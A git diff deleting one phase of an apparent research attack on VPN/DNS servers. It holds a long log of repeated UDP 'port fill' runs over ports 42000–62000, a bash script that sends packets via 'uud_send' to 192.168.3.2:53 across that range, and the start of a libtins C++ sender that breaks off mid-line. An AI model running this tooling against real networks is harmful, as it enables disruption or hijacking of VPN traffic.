1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:20:05 -Starting port fill at 2020-09-06 16:21:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:21:04 -Starting port fill at 2020-09-06 16:22:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:22:06 -Starting port fill at 2020-09-06 16:23:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 16:23:05 -Starting port fill at 2020-09-06 20:49:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:49:16 -Starting port fill at 2020-09-06 20:50:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:50:09 -Starting port fill at 2020-09-06 20:51:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:51:08 -Starting port fill at 2020-09-06 20:52:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:52:04 -Starting port fill at 2020-09-06 20:53:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:53:04 -Starting port fill at 2020-09-06 20:54:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:54:10 -Starting port fill at 2020-09-06 20:55:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:55:05 -Starting port fill at 2020-09-06 20:56:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:56:08 -Starting port fill at 2020-09-06 20:57:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:57:05 -Starting port fill at 2020-09-06 20:58:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:58:05 -Starting port fill at 2020-09-06 20:59:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 20:59:05 -Starting port fill at 2020-09-06 21:00:02 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 21:00:05 -Starting port fill at 2020-09-06 21:01:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 21:01:08 -Starting port fill at 2020-09-06 21:02:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 21:02:06 -Starting port fill at 2020-09-06 21:03:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 62000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 62000 with udps.. -Sent w size 1000 to 43000 -Sent w size 1000 to 44000 -Sent w size 1000 to 45000 -Sent w size 1000 to 46000 -Sent w size 1000 to 47000 -Sent w size 1000 to 48000 -Sent w size 1000 to 49000 -Sent w size 1000 to 50000 -Sent w size 1000 to 51000 -Sent w size 1000 to 52000 -Sent w size 1000 to 53000 -Sent w size 1000 to 54000 -Sent w size 1000 to 55000 -Sent w size 1000 to 56000 -Sent w size 1000 to 57000 -Sent w size 1000 to 58000 -Sent w size 1000 to 59000 -Sent w size 1000 to 60000 -Sent w size 1000 to 61000 -Sent w size 1000 to 62000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 21:03:04 -Starting port fill at 2020-09-06 21:04:01 -Using tun src ip: 10.8.0.10 -Filling up vpn port range from 42000 to 43000.. -arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -we server? : 0spreading the port range from 42000 to 43000 with udps.. -Sent w size 1000 to 43000 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -finished phase 2 w possible port: 1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -1 -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Filled up all those ports and finished at: 1 -Finished port fill at 2020-09-06 21:04:02 diff --git a/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah b/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah deleted file mode 100755 index 8043c4e..0000000 --- a/server-side-attack/dns-sside/phases/udder_fillup/fillup.blah +++ /dev/null @@ -1,26 +0,0 @@ -#/bin/bash -# - - -START_PORT=42000 -END_PORT=62000 - - -SRC_IP=10.8.0.10 -#SRC_IP=$(ifconfig | grep inet | grep -w 10.8 | awk -F' ' '{print $2}' | awk -F':' '{print $2}') -NOW=$(date '+%F %T') -echo "Starting port fill at $NOW" - -echo "Using tun src ip: $SRC_IP" -echo "Filling up vpn port range from $START_PORT to $END_PORT.." - -sudo ./uud_send 192.168.3.2 53 $SRC_IP $START_PORT $END_PORT - -#sleep 1 - -#echo "Responding to all my own client probes to make sure they're kept in the table" - -#sudo ./uud_send 192.168.3.2 54 192.168.2.2 $START_PORT $END_PORT 1 - -NOW1=$(date '+%F %T') -echo "Finished port fill at $NOW1" diff --git a/server-side-attack/dns-sside/phases/udder_fillup/send.cpp b/server-side-attack/dns-sside/phases/udder_fillup/send.cpp deleted file mode 100644 index b39eb21..0000000 --- a/server-side-attack/dns-sside/phases/udder_fillup/send.cpp +++ /dev/null @@ -1,165 +0,0 @@ -#include -#include -#include -#include -#include -#include -#include - - -using std::thread; -using std::cout; -using std::string; -using std::vector; -using namespace Tins; - - -bool is_running = true; -bool verbose = false; -bool count_resp = false; - -string dest_ip; -string server_ip; - - -void print_divider(int count) { - int i = 0; - while (i < count) { - if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n"; - i++; - } -} - - -std::string random_string(std::size_t length) { - - const std::string CHARACTERS = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; - - std::random_device random_device; - std::mt19937 generator(random_device()); - std::uniform_int_distribution<> 